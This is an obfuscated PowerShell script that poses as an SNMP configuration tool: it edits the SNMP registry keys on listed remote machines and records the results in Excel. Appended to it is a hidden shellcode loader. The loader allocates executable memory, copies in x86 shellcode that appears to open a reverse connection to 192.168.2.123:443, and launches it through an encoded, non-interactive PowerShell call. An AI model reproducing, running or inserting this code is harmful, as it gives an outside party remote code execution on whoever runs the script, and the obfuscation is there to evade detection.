sET-vArIABLe  j964 ([TYpe]("{2}{0}{1}{5}{3}{4}" -F'ft.WI','n3','micROso','t','ryKey','2.reGIS') )  ;set-itEM ("VArIA"+"B"+"lE:wDoc")  (  [tYPE]("{3}{0}{1}{2}" -F '.','CO','nVeRt','sYstEm') ) ; seT  Ms9dAz  ( [TYpE]("{2}{0}{1}{3}{4}"-f '.','TeXT','sYsTem','.ENC','odiNG') ) ;set-vARiAblE  ('9x'+'Zp') ( [typE]("{0}{2}{1}" -f 'INT','tR','P')  ) ; 

${er`ROr}.("{0}{1}"-f 'Cle','ar').Invoke()
${e`RrOr`A`CtioNpRe`F`ERen`ce} = ("{3}{0}{2}{1}" -f'ilentl','ontinue','yC','S')

${A} = &("{0}{1}{2}" -f 'New-Obje','c','t') -comobject ("{0}{5}{4}{3}{1}{2}"-f'E','ica','tion','l','cel.App','x')
${A}."vI`Sib`lE" = ${tR`UE}
${B} = ${a}."WorkB`o`okS".("{0}{1}" -f 'A','dd').Invoke()
${c} = ${B}."wORks`hee`Ts".("{0}{1}"-f 'It','em').Invoke(1)
${C}."cel`lS".("{1}{0}" -f'm','Ite').Invoke(1,1) = ("{1}{0}{2}{3}"-f 'hine','Mac',' Na','me')
${C}."C`elLS".("{0}{1}"-f 'Ite','m').Invoke(1,2) = ("{1}{0}{2}"-f'da','SNMP Up','ted')
${D} = ${C}."US`EdRange"
${D}."inTE`R`IOr"."CoLOR`INd`Ex" = 19
${D}."fo`NT"."C`OlORind`Ex" = 11
${D}."F`ONt"."b`Old" = ${t`RUE}
${In`TrOW} = 2

foreach (${str`C`O`MpUTeR} in .("{2}{0}{1}" -f '-conte','nt','get') ((("{3}{0}{1}{6}{4}{5}{2}" -f 'M','a','.Txt','C:{0}','e','List','chin'))  -f  [CHAR]92)) {
		${c}."c`elLs".("{1}{0}"-f'tem','I').Invoke(${IN`TroW},1) = ${sTrco`MPUT`ER}.("{0}{2}{1}" -f'T','er','oUpp').Invoke()
		
		${p`INg} = &("{1}{0}{2}" -f 'ew-','n','object') ("{6}{3}{0}{9}{5}{1}{7}{4}{2}{8}"-f 'm','work','ion.','ste','format','et','Sy','In','Ping','.Net.N')
		${R`EPLY} = ${P`ING}.("{1}{0}"-f 'nd','se').Invoke(${sTrCo`mPuT`ER})
		if(${Re`pLY}."STaT`US" -eq ("{0}{1}"-f's','uccess')) {
			
			${r`eG} =  (  ls VaRIablE:j964  ).VaLuE::("{3}{1}{2}{0}"-f 'y','nRemoteB','aseKe','Ope').Invoke(("{2}{0}{1}{3}"-f 'calMac','hin','Lo','e'), ${STRc`O`MPutEr})
			
			${regK`EY}= ${r`EG}.("{2}{0}{1}"-f 'u','bKey','OpenS').Invoke(((("{16}{19}{11}{13}{3}{5}{17}{6}{20}{8}{15}{9}{1}{22}{18}{14}{7}{12}{4}{2}{0}{21}{10}{23}"-f'ommu','MPhC5h','C5ValidC','hC5Curre','h','ntCon','lSethC5hC','etershC','v','C5hC5SN','it','Mh','5','C5','am','icesh','S','tro','r','YSTE','5Ser','n','C5Pa','ies'))."rEpL`A`CE"(([cHaR]104+[cHaR]67+[cHaR]53),'\')),${tR`Ue})
			
			${Re`gkeY}.("{2}{1}{0}"-f'tValue','e','S').Invoke(("{1}{0}{2}" -f 'nit','ipm0','oR'),'4',("{0}{1}"-f 'DWO','RD'))
			
			${rEg`keY}.("{0}{2}{1}{3}"-f'De','te','le','Value').Invoke(("{1}{0}" -f'blic','pu'))
			If(${E`RRor}."cO`Unt" -eq 0) {
				${c}."cel`Ls".("{1}{0}"-f 'em','It').Invoke(${INT`R`Ow},2)."in`Ter`ioR"."C`Ol`OrI`NDEX" = 4
				${c}."CeL`lS".("{0}{1}"-f 'I','tem').Invoke(${In`TRoW},2) = "Yes"
				
				}
			Else {
				${c}."ceL`ls".("{1}{0}" -f'em','It').Invoke(${inT`Row},2)."in`TErIoR"."cOLOri`N`dex" = 3
				${C}."c`ElLS".("{0}{1}" -f 'Ite','m').Invoke(${I`Nt`ROw},2) = "No"
				
				${E`R`RoR}.("{0}{1}" -f 'Cle','ar').Invoke()
			}
		}
		Else {
			${C}."cE`LlS".("{0}{1}"-f'It','em').Invoke(${intr`OW},2)."iN`TEr`IOr"."CO`loriN`D`eX" = 3
			${C}."c`elLs".("{0}{1}"-f 'I','tem').Invoke(${int`R`ow},2) = ("{3}{0}{1}{2}" -f 't Pingab','l','e','No')
			
		}
	${eRr`oR}.("{1}{0}"-f'ear','Cl').Invoke()
	${R`EplY} = ""
	${pW`Age} = ""
	${I`N`TrOW} = ${iNt`ROW} + 1
	}
${d}."EnTiR`eC`olumn".("{2}{1}{0}" -f'oFit','ut','A').Invoke()
.("{1}{0}"-f'ls','c')
${1} = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x02,0x7b,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';${e} =  $WDOc::"TObAs`E6`4ST`RING"( $Ms9DAz::"UN`iCoDe".("{2}{1}{0}" -f'es','yt','GetB').Invoke(${1}));if( $9XzP::"Si`ze" -eq 8){${x`86} = ${eNv:S`ysT`e`mroOT} + ((("{13}{11}{0}{3}{7}{6}{8}{12}{2}{10}{1}{4}{5}{9}"-f'q','STqv1.','rS','syswow64ST','0STqpowe','rs','ws','qWindo','P','hell','hell','T','owe','S')) -crepLACe([cHar]83+[cHar]84+[cHar]113),[cHar]92);${c`MD} = ("{4}{0}{2}{1}{3}" -f'op','-noni ',' ','-enc ','-n');.("{0}{1}"-f'i','ex') ('& '+"$x86 "+"$cmd "+"$e")}else{${c`Md} = ("{3}{0}{2}{1}" -f 'op ','noni -enc','-','-n');&("{0}{1}"-f 'ie','x') ('& '+'powers'+'h'+'ell'+' '+"$cmd "+"$e");}
